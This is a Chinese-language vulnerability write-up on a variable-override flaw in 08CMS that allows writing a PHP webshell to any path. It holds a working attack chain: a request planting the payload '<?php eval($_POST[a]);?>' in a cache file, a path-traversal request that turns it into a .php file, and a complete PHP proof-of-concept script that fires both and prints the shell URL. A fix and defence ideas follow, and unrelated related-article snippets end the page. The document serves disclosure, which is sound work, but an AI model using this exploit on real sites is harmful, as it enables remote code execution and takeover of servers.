目录

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

简单描述这个漏洞

. /include/general.inc.php
//本地变量注册
foreach(array('_POST','_GET') as $_request)
{
foreach($$_request as $k => $v)
{
$k{} != '_' && $$k = maddslashes($v);
}
}
/*
这里实现了模拟GPC功能,将用户输入的GET、POST数据中的变量注册到本地代码空间中,导致攻击者理论上可以向应用程序"注入"任意的变量值
*/ . 通过本地变量覆盖,黑客可以控制目标应用程序将要进行的写文件操作,向网站目录下的任意位置写入任意文件

2. 漏洞触发条件

0x1: 攻击流

. 上传一个包含WEBSHELL的非PHP文件
/*
/tools/ptool.php
..
$cf = M_ROOT.'./dynamic/stats/aclicks.cac';
$ct = M_ROOT.'./dynamic/stats/aclicks_time.cac';
..
if(@$fp = fopen($cf,'a'))
{
fwrite($fp,"$aid");
fclose($fp);
..
通过注入$aid,利用程序的本地变量覆盖漏洞,向/dynamic/stats/aclicks.cac写入WEBSHELL代码
$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
*/ . 在第二个变量覆盖攻击点,传入这个文件路径(将要被打开的文件路径):
$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac . 程序打开/dynamic/stats/aclicks.cac,并重新写入到"/dynamic/stats/aclicks.cac.php"中,完成GETSHELL

0x2: POC

<?php
/*
exp: index.php?tplname=../../dynamic/stats/aclicks.cac
汽车CMS Shell: /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
装修CMS Shell /dynamic/dynamic/stats/aclicks.cac.php
*/
//$exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
$exp = '/tools/ptool.php?aid=%3C%3Fphp%20eval%28%24_POST%5Ba%5D%29%3B%3F%3E';
//$exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac
$exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac'; if ($argc < )
{
print_r('
+---------------------------------------------------------------------------+
[+] php '.$argv[0].' [url]www.08sec.com[/url]
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(E_ERROR);
set_time_limit(); $host = $argv[];
go($host); function go ($host)
{
global $exp,$exp1; $re = Send ($host,$exp);
stripos($re, "MySQL") > ? Send ($host, $exp) : ""
$re = Send ($host, $exp1) && stripos($re, "aclicks.cac") > ? exit(" + Exploit Success!rn + http://$host/template/dynamic/stats/aclicks.cac.phprn") : exit(" - Exploit Failed!n");
} function Send($host,$url)
{
$data = "GET $url HTTP/1.1rn";
$data .= "Host: $hostrn";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 2000) Opera 6.03 [en]rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Accept-Language: en-usrn";
$data .= "Connection: Closernrn";
$fp = @fsockopen($host, );
if (!$fp)
{
die("[-] Connect to host Errorrn");
}
fwrite($fp, $data);
$back = '';
while (!feof($fp))
{
$back .= fread($fp, );
}
fclose($fp);
return $back;
}
?>

Relevant Link:

http://www.unhonker.com/bug/1390.html

3. 漏洞影响范围

08CMS全部商业版

4. 漏洞代码分析

本地变量注册实现代码

/include/general.inc.php

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAYYAAACaCAIAAAAigXjmAAAUfElEQVR4nO2dv2sbSRvH729R4d3GhQ4ETnEOXsP7msgnrMPgWIh0SnwpYuV8q94QuFSBuNqkzZXBEFQthDftlYebVyKYt0t74Eqp/Bb7Y349MzsrS6tZ+QufQh7P7Ixmd796nmdm9/nB8xsAAOAIP6x8BAAAkANJAgA4BCQJAOAQkCQAgENAkgAADgFJAgA4BCQJAOAQkCQAgENAkgAADgFJAgA4BCQJAOAQkCQAgENAkgAADgFJAgA4hEaSvP3pxm+xZ3mUdjS9irqr/zJrwmg8idqrH0bKMJ6Nw9UPA9wXSklSM9r47XvKdl4exjfyLeTtTzeOhev4wft357eX57eX57ev9hqe3/D2Pl8OwrzC40FWTtbMSi7Pby/Pr08fpE1YYX4orjl/fIrO6Zl0zPAV11Hauy/3xZcr83aszg9dSDIaz2Y3KfHQUDOMb5Sa7WiqFja60ZUqcFTzhte9mJC9j8az6UV31VcquCeUcdy8Y+KmGo2pm2c7FiQpfHXOK8716QOdJIWvMsVhNdlBPj/memEqJnTENzHQOT1TNYvrguv98aBQ3RKa0cYg8pKvn3zQFVJ0Lyazceg3wrjY5Azjm3hE/ks2anSSpDQfxjNtv/ruAFgwqiTlptCxZK53vcHUa0r1NRerIEk7R9eS+rw76pCSJNXcObp+d9TJ/rSQJFnF9Ox9vjx7vyOX8110Ts9uX+0lxxT61dOMEtNSMBLJQopUktrRtNhRWrwkdS8mekmCoQQqQ2clCZrS9Qbfmcv223f2a68LNAjNUw3K/kx1h5IkWWWEOoQk5c5Ufvydo+vL81tKbgRy7UvrM8eNt5I+P/Z14qXB259u/PZ9Y79bWEiR+lMWNz/veYmKYytJavNudKXvHRElUBFWkpRAWUkrliShMkcqNHpvS7S/Oqdnaiwps7bsJcnbn24MIu/4+8ZxKBhHSqHhIHlApyiWtGjHjdWneje5dQAskCVJkoCF45Z6SaJSlHfcBIxxJUFoeElSfDRrxy3M5CYzKo9DTaHpOGlsrkAClidJ2UGk3mElgYq4oyS1oyl1caemQfYnH+LJP/O3ev5ZrslrQUlJKogrha+Yu2eUJDoQTtD1Bln4P4nHbesKTSQ7AMyRnWVLktp792KCWBKoBFWStmMhbMQiIGR4mw58SpLk8wv5nEzYF/oNcywplQxhu0BhnFt100hJaojbBQw6yG+S2M8EiCykmvM7AIq8JEpTtJsAuMOmakVsAjD2jhU3UBkL2L1N7Eui0d3wgJ9M90I2WG4DFbKQB0qsd2/nVoz9Gtad4Xc/2m2hdIh4xpkzFmHvJYAoEqgUPOMGAHAISBIAwCEgSQAAh5Al6V//3llif2494w7socKFbp1NxLzWhKqsJDefca8a8rYx30v5d5/vflvMjSovqrp5NrEyuBZUYiU5/Ix7tcwhSfZ1FtuQQ3rZg8NnE/un1oBKrCSXn3Gfj9F4Eo8ns5vZ9CKKb2aztFP+V50Ng/9Vz79CUaH5YdrCjrLmw3g2jrLdktzMDGOr5tSUunw2VUNpGWcfLJOKYkkOP+POkT6yT+xclxmNZ7Nx6A/j2c0kahMjyUwJ8Vc9/wpkoWF7l97YYR2RzYdx7t2wh0J4NSnsneja4bOpjBaSVDcqXHFz9Bn3uWAPx45DfiTCYxnj0Je8nuwrkIXZCKmYsXKnqR3RzfmG2WfBQGOPj2h616iho2fTHScdzEmFK26OPuPOUcpKIiSJsn3KSFL+vZSbTapDGllkc40k6Q0cpXeNJDl6NrHuVnsqtJLcfMZ93u9ilqQwzowXwbEyFkrjFFRDK0msI7o5JUn+MJ4VzRLrXfOyBzfPpqq23YsJbXgCR6nESnL4Gff5vxHluOW9T6ILyR2bzW7ikeyjiYXDmBjnUHjMLbvfqI50zVVJEn03Jl6aWZJixg6fTc0K3Wp3foByVGclufiMO7BDfdmDi2eT3pfUjqawkupEtbu3ORx4xh3YU/CyBwfOJhVFGo01ywXAXfCMGwDAISBJAACHWKQktTqHJ53NMvXbBy1zna3+IGiZKmy2iCNsHRQMg2wFAFg9C7WSgnZoUJCgHfa2+BIrCQvafJ1W51A8yObB4En4UkEexlb/5RPuOEmr9q5unOlxDg9a/J9PpPEDABaOSZJIyTDpiCgfXhAIRlDQ7gfJ563+y/YubSVt9SVx6W21Oof5nyedTfGwmwc9VQS3+oR2bPV7W15rM6+8G2R1Wlu71Dh3e+1dv+G1gn5nM/ni2fgBAMvCIEmpcBgKd3uUhcLUJBD0gpekQdBKJSkxWA5Fbdo8GDwJe8HBIOlrqz8IWpk0iNBWkkY0Nw86AVF/0O5T44QkAVA9WkkqayK1Oof9Xvuks8msj5xWcMJJQD/Y6g+Cg17uHMmWzm4vUahNQZISry2Xm9SfOiSjUblh1Q/SmiedTdEayg+uYJKkwigVAOBO6CRp82Cg3u1kYcPzszhR4rgxa0iuw4tRP8gdN0GSdntPsuaSJKVykCpFiuLopYhy0woOgsZuhxc+UpJ0R2OHPSgOyQMA5kcjSUooWlvoN9i6WBZL4mRFaE45bg1BkpI6WUS5HyQa0d5tBScvn5wMAlsRUaPsqbFDO3rCaCUrKfsTjhsAFUBKUikTiYsuceHt3Z6iC6Qkddq0gqQHSXukNS45VK6S7PhEzDs/FPd1aMctD7onkpT/CUkCoAIoSWoFJ5SVQRQG7fBle5cyVfpBEtDhhCBo93tJWCfIY0P5TS56VTmpUaPVgtZmi1+kZ4v33M6jJJIlD14nSUzOEknK/URIEgAVQEgSaZIQha3gRPLjpE0AXHmynJ9FvokNkGKEiHV60tn0WsEJHcbePOgdnpBW0uDwhDeU1KEKkrS1m381bofBbq+9y+26hCQBUAGKJNmbSCo6SaJqKtGfw4NAXZvLmwgxoL5SU0MmZGkUjLfmDg9a+Z/tfi/bFZkoVys4efmk3wlOXqbhJMPqHgBggeAZNwCAQ0CSAAAOAUkCADgEJAkA4BD1kqSCdxuude81pdqUIUmSgtV/a7dnyW10ktSMWO6g7QoHtB1vHOvOjfoG6Cohem///NfXZ2/a5oYPP379/VvGx+d8W1Phtz8fen7De977xjX/xndn1Xupms03X+SOXvzJ9T7fkOhXYi8aPk2A029M1iehqmCW6oBGkrzjapUoRy9JUmb6iiF7t5Wk3gu5/sOPeUOy0HCQcr3b12y++ZKJDseLPznFnHdIRenY7kyWhMrFJAUyWoNo6bNUE2hJ6nqDqdcUCrm0i7GXTeLGIGLleSLG7ZioyVI25oVi+XbW9jjyBkRN5YT99OGfp9OUX37NC//e+/VtPyn/z9sfTYVK80dv+9NPP6XHf7T3H3ZYzeVC3ZamOs03X37/+Lyx//oZf/Pvv3721+umUTjIjmx6t675vPfty8/7Snk5SdJ1ZGEC0FcId9XJFyRPKkl8YnF9R/FVNMpyRrFRsZxR7EQLaYHzzFRUEqqi5lJOLdqag6HkNzxVkrqZHGQMIq/h+dtx+iG5StLPIadEYXolNSNm5lAmj7c/zQpDwitM5Gw7q7nPXTH6q42Tkp8+CKKTaApZSDXnZOjR2/6HU8+m9wIkK6n3Qr3Pn/cShdp//ezb198pabBXnznJVTIdA+W4/fWaF4VSQyozgewKaUb5VVdEerdb3NJhLKTDi0cNT9AyPq2emg6PlCSyuS7yaJgKRJQanq2VJPpxmfqwD1xNKYd1LmTHXGFywXEyx+BVjP9Mna1fP+VmzlNOkmTF0RSSzb1fPz39cOolhtWjvPIdJYkI0JCSlJCKguBDVSFJnOI033zRDHXOIRXk6dZcIekPpMk+4smtEqODTxi8gjWUZaykk6RrEpqrzbNkmUr00yxJ7jueS2cZkrSv/FLx6pMLDRk2spek01+muWqc/lJakujm2efTXzKrStO7PcStK97/8p9ZK96JW7okiY7bMiTJPIHkFZKSWe5FwU2WgrhkTnA1bbdfUpL01lmaxZc41ByzdC+wlCTmrEmOmyxJ/nZMF/K+HnPclB9AnSSpmemZpvz0YQ4riW6eVv7wSayv9m5PURg48+a0FXQHIRmNhXBGuXHmrtmiJcl40xquEPEKVH/q5O8+idpe92JSVpL8YaxOWhYyzzKGy95cGPOFxjkXvr5eMYtn6V5gH94+ln0xWpIk341FmrIg5b4oOkR4mw5FKcG/PD7d/+NteSuJbu75UpBb27s1mluXLaVn0iMsrktxbuv7v3sxmT+/K+1jypsAyg7Jbi2JukL4y8MYVOJ3ABT5PvRgeOcrO9GpgTO7iUfMfskLJ9EFM2qI5sNYM6T8CJKDiRW3hDptlaxmX9KPf/zd/+PRqnq/M0W/2NVT1ULSMncALN+lwnJbRp0kadn7p3/84++n03+esoW2cr1/FDYQqmbF0tHEU1c7zpXFR2Ih5HzHLZTL/haIIjHqJUkAgDUHkgQAcAhIEgDAISBJAACH0EpSskO/DmtMAID1QSNJ2LUFAFgFkCQAgENoJGm1LycCANxXVElqR1PH38sHAFhbYCUBABwCsSQAgENAkgAADqGXJDwHCACoHGyVBAA4BB4oAQA4BCQJAOAQkCQAgEPIkvSvf++sfEzVQr0rkkwtX9d880tjtRNi1Tve1lg/qrSSmpH88v9q0Cf1Vt+oTaaWr3u++YVDTMhy30Fc1LuxMraz1IoKrSQxGVyF6CVJ2qROppZfi3zzi4SekLtKEpVBy75345GR+aNWVGclUYmYWHqlmCViGkSsPE/dxfLncDWpLPJCOUvEFGWJxYWa0sVKppZfj3zz0jjJqeNOh0kd6AlhktSNrgozF1EkRnTRj5bpHOUjEU8rDKVaUYWVlGUrlXJycQlOxXSVfPa32Gt4fjPSJXfz8+YsXaVyWSdytp3V3OeUQlYZMrX8WuSb18CmrhmZc6UVTEg6pG50VTBRcop2IWFk1xsQeSWte/d88sEDRJTqxOqspHJJvVVFI7PI83mcc+yTejc8X5Navvb55qUpVacu/eWw8p6ICUlSwloJt8XYisRROR3d6CqZjfyDOC3uO90gpbpY0t0kSU2+TGaRJ8NGJSWJTC1f+3zzhVPHTpPV+oM8Ie1oehVF41nhAO5sJWlOxzCeXnRp/xpWUp1YoZXEnDXJcVOSem/HdCGRRZ6KkuokSQk6JJCp5eueb95i6sRTo/4GmGcpc51GFqqkmz37pVjqdKSBPNWMxTPktWJ1VpLPuw/MUKckSfppZZEmJYt8Q0wkz8LbdChKCnySqeXXIt+8PE5i6vh5M/pN9IRw0ZzReFY+CbjtipvhdGj6xYpbvbjvu7flfUma1eV655tfyrytMjpToncst9UN7N6eZ0NNrfLN32cwt/XjvltJAACngJUEAHAIWEkAAIeAlQQAcIhKrSS8PBcAYKZCKwk71gAARVRoJUGSAABFVGglIYMuAKCIaqykdjR1/H2MAAAngJUEAHAIxJIAAA6BFTcAgENUayXhGUgAgJFKd29jqyQAwAyecQMAOASecQMAOASsJACAQ1RhJS3X8lptZvr1g5xPTPKCod5lajXJ6/+ezDpbSSUz08vB9Qfv353fXp7fXp5fnz5I6yhpiIxwKS3nof3zX1+fvWkvriZLr7BdUGg7n6UnuVrI+9N802b55ua8sRejCPIb38mZN5ymtd5MU1srqWxmenlXVPjq/PbVXsPzE236/Ni3OIgMmTbOmgVLUp6ulk/TRhZaz2fZSa6aOSTJvs5iG3JIjzHQk2xivXOu1NZKKpuZXpKkvc+XZ+93/IbnN3aOri9zefIbXomL426S5D/8+LX3YmE1m1GSb0qw3chC6/ksO8lzMxpP4vFkdjObXkTxTZ77KM21PbsRsiEJGYCp1FJUoegTycpS2FHWfBjPxhFLeMUf0KZ52pcgKKaZzydcbKIaSkUZBmtEba2kspnpxZ+mnaPry0Ho+Y3Hg9vLs/enA0mSLH+FREky5nGtgnQAYr9koe18lpxkejwWE5ImpBzGs5tJ1CaSaLNbVMxwayo0WHN6Y0fI+qk2H8a5b8V+5Hg1Keyd6NowyWJH+oOssSTVDKvM9MR7CHaOrt8dhadnt++OOp7feCxKkpdcJcUe+x2tpIWSZgw+/r5xHArGkVJYYj7tJ/lusITa49BvMEkSEkmOQ1/6acnuTDqheRoZpGLGyi2tdkQ31yRJFzJo8Sak2rtGDZWZzyeBEGjbtMa1pMZWkueXyUwvOfB7nzlnrXN6Np+VJLJSKynPEtz1Bt+ztNpkYZn5LDnJc08ILUmU7VNGkhKoJQupDmlkkc01kqRXZ6V3jSQRMz+Mpxdd2Ws2HmQtqLmVZJ+ZnghvZwttXFwpwTaWlNogq54Ev+GlopOsqTWjbH2NLCwznyUn+Q7n0SxJYZwZL4JjZSw0nX2tJLGO6OaUJPnD2JxwXOhdCQzpZz6Mr6LRxURdg1NFsHsxWZdHtWprJZXNTK+eRbYJgF9ua3j1lKRMdFJ7JBMgstB6PstO8l3OJuW45VHnSXQhuWOz2U08kn00sXAYE4MfCpmKs0uC6kjXXJUk0Xdj4qU2z74sfynSk2yaXsqK54JcNafeVlKJ3PAl3kPgziK3E/NZYpKB7TzLFk2JSab3JbWjKawkaxx5bs7mPQTltkoulI9ff/8m8efDlU8aWA5z/+xRUaTReJ1esFFvKwkAsGbgTQAAAIeAlQQAcAhYSQAAh6jISlph2BgAUCOqtJLu7+I6AMCSSmNJ2OECADBTdYaSNX7PCwDg7lS94mb3hD0A4J4CKwkA4BCIJQEAHKJiKwmSBAAwUaWVhE0AAIACKrKSsFUSAGADnnEDADgEJAkA4BCQJACAQ0CSAAAOQUgSQtEAgFWhs5KwYA8AWAFaxw3bGgEA1WOQJDyPBgCoGlN4G0/tAwAqBlYSAMAhEEsCADgEJAkA4BDYBAAAcAhslQQAOAQeKAEAOIQgSf/7339XPiAAwH3m/6ZxAUPkzq3AAAAAAElFTkSuQmCC" alt="" />

/index.php

include_once dirname(__FILE__).'/include/general.inc.php';
include_once M_ROOT.'./include/common.fun.php'; if_siteclosed();
mobile_open() || message('手机版尚未开放');
/*
function un_virtual($str)
{
......
$str = str_replace(array('/','-'),array('&','='),$str); 把 / 和 - 替换成 & 和 =
......
return $str;
}
parse_str()把查询字符串解析到变量中,保存在变量$temparr中
*/
parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);
... $_da = array();
if(!$cnstr)
{
//$tplname这个在这里定义的了,相当于被初始化了
$tplname = $_ismobile ? $o_index_tpl : $hometpl ;
$_da['rss'] = $cms_abs.'rss.php';
$_da += $temparr; // $_da= $_da+$temparr
unset($temparr);//销毁变量 //变量覆盖,这样我们可以控制了$tplname这个变量,即对它重新覆盖
extract($_da,EXTR_OVERWRITE);
//这个tpl_refresh函数就是漏洞利用的关键点
tpl_refresh($tplname);
...

/include/refresh.fun.php

function tpl_refresh($tplname)
{
global $templatedir,$debugtag;
$tdir = M_ROOT."template/$templatedir/"; //$tplname可以由攻击者控制,所以$cacf也等同于被攻击者控制
$cacf = $tdir.'pcache/'. $tplname.'.php';
if(file_exists($x = $tdir."function/utags.fun.php"))
{
include_once $x;
}
mmkdir($cacf,,);
if($debugtag || !file_exists($cacf))
{
//打开文件,返回内容
$str = load_tpl($tplname);
$tpl = @file2str(M_ROOT."template/$templatedir/".$tplname); //file2str这个是打开文件的函数
$rt && $tpl = preg_replace("/{tpl\$(.+?)}/ies", "rtagval('\1','$rt')",$tpl); 过滤 $str = preg_replace("/<\?(?!php\s|=|\s)/i", '<?='<?'?>', $str);
$str = preg_replace("/<!--{(.+?)}-->/s", "{\1}", $str);
breplace($str,'');
nreplace($str);
quit_refresh_var(); $str = tpl_basecode($str); /*
漏洞的关键,在这里
1. $str: 攻击者可控制,这是一个.cac文件的内容,攻击者可以通过另一个变量覆盖向服务器写入一个.cac的WEBSHELL
2. $cacf: 攻击者可控制,攻击者传入的参数是一个非PHP文件路径(.cac文件),这个文件也是真实存在的,可以通过另一个变量注入上传一个.cac文件,同时,程序在末尾拼接了".php",使其成为写一个PHP文件 从结果上来看,相当于进行了一次.cac到.php的后缀重命名处理
*/
str2file($str, $cacf);
}
unset($str,$tdir,$cacf);
}

5. 防御方法

/index.php

if(!$cnstr)
{
//$tplname这个在这里定义的了,相当于被初始化了
$tplname = $_ismobile ? $o_index_tpl : $hometpl ;
$_da['rss'] = $cms_abs.'rss.php';
$_da += $temparr; // $_da= $_da+$temparr
unset($temparr);//销毁变量 /*
如果对应变量已经存在,则不进行覆盖操作
*/
extract($_da, EXTR_SKIP);
tpl_refresh($tplname);
...

6. 攻防思考

防御变量覆盖的防御思路

. 重新运行一次原始的代码逻辑,将被覆盖的变量再赋值回原始的值
. 在本地变量注册的入口处对关键字进行检测

Copyright (c) 2014 LittleHann All rights reserved

08CMS Variable Override Write Arbitrarily WEBSHELL Into Arbitrarily Path的更多相关文章

  1. 【已解决】mac上appium报错:“Could not find aapt Please set the ANDROID_HOME environment variable with the Android SDK root directory path”

    按照网上教程配置完appium环境后,真机跑自动化过程,遇到如下报错: appium报错如下: [ADB] Checking whether aapt is present [ADB] The AND ...

  2. Could not find aapt Please set the ANDROID_HOME environment variable with the Android SDK root directory path

    写case写好好哒,突然debug的时候就冒出这个错误: selenium.common.exceptions.WebDriverException: Message: An unknown serv ...

  3. Appium问题解决方案(7)- Could not find 'adb.exe' in PATH. Please set the ANDROID_HOME environment variable with the Android SDK root directory path

    背景:运行代码提示找不到ADB An unknown server-side error occurred while processing the command. Original error: ...

  4. Scala中的override

    Scala中的override override是覆盖的意思,在很多语言中都有,在scala中,override是非常常见的,在类继承方面,它和java不一样,不是可写可不写的了,而是必须写的.如果不 ...

  5. 56.ERR! configure error gyp ERR! stack Error: Can't find Python executable "python", you can set the PYTHON env variable.

    Node.js 在安装模块的时候报错,缺少python环境. ERR! configure error gyp ERR! stack Error: Can't find Python executab ...

  6. Android 中的mvvm

    我们来了解一下MVVM模式与Databinding ,MVVM是一种模式,Databinding 是一种框架.DataBinding是一个实现数据和UI绑定的框架.而ViewModel和View可以通 ...

  7. 学习 java命令

    依稀记得自己第一次编译*.java文件,第一次运行*.class文件.但是六七年过去了,现在运行java写的程序更多的是用tomcat这种web容器.最近有个小需求,写一个监控zookeeper集群的 ...

  8. 智能电视TV开发---客户端和服务器通信

    在做智能电视应用的时候,最头疼的就是焦点问题,特别是对于个人开发者,没有设备这是最最头疼的事情了,在没有设备的情况下,怎么实现智能电视应用呢,接下来我是用TV程序来做演示的,所以接下来的所有操作是在有 ...

  9. Automake

    Automake是用来根据Makefile.am生成Makefile.in的工具 标准Makefile目标 'make all' Build programs, libraries, document ...

随机推荐

  1. Linux设置环境变量(解决许多命令找不到)

    不知道服务器被谁给改坏了,许多命令都不能使用找不到,但是可以在/usr/bin/,/usr/local/bin等里面找到源程序,当时首先想到的就是环境变量,因为Windows在设置了环境变量之后就可以 ...

  2. ORA-06519: active autonomous transaction detected and rolled back

    这个问题一般怎么解决 ?现在忙 待会贴详细代码  先给些路子..给位大大们 引用 楼主 green3365302 的回复: 这个问题一般怎么解决 ?现在忙 待会贴详细代码  先给些路子..给位大大们 ...

  3. 解决Kafka-1194问题

    生产环境中使用Kafka作为日志处理的中间件,系统结构是这样的.自12月上线一个多月来,系统运行稳定. 用过kafka的都知道,Kafka产生的消息全部存储到硬盘文件中,并且在消息被消费后不会被立即删 ...

  4. 使用spring boot和thrift、zookeeper建立微服务

    Spring cloud适应于云端服务,也适用于企业信息化SOA建设.spring boot也是restful微服务开发的利器.但对于内网服务,即服务与服务之间的调用,spring并没有去刻意封装,也 ...

  5. 获取用户请求过来的URL

    document.referer 一段JS搞定

  6. DIV+CSS 星号*

    常常我们在DIV+CSS布局的时候会遇到2处使用星号“*”,一个为以星号*没有命名名称的CSS选择器:另外一个是在CSS选择器里以*开头的CSS属性单词样式-CSS星号-CSS *知识介绍.接下来DI ...

  7. Change Eclipse Tooltip's Color in Ubuntu

    这个问题十分高级,随着Ubuntu版本的变迁这个问题的解决方案也在不断变化 最开始,SystemSettings里面可以设置工具条背景色,后来这个选项在新版本Ubuntu中消失了 我用过Ubuntu1 ...

  8. Python 练习册

    01:将你的 QQ 头像(或者微博头像)右上角加上红色的数字,类似于微信未读信息数量那种提示效果 [图像处理] 类似于图中效果: py 2.7代码: from PIL import Image, Im ...

  9. git标签

    git标签 如果你达到一个重要的阶段,并希望永远记住那个特别的提交快照,你可以使用 git tag 给它打上标签.-a 选项意为"创建一个带注解的标签". 添加标签命令: $ gi ...

  10. git flow的使用

    简介 Gitflow工作流程围绕项目发布定义了严格的分支模型.尽管它比Feature Branch Workflow更复杂一些,但它也为管理更大规模的项目提供了坚实的框架. 与Feature Bran ...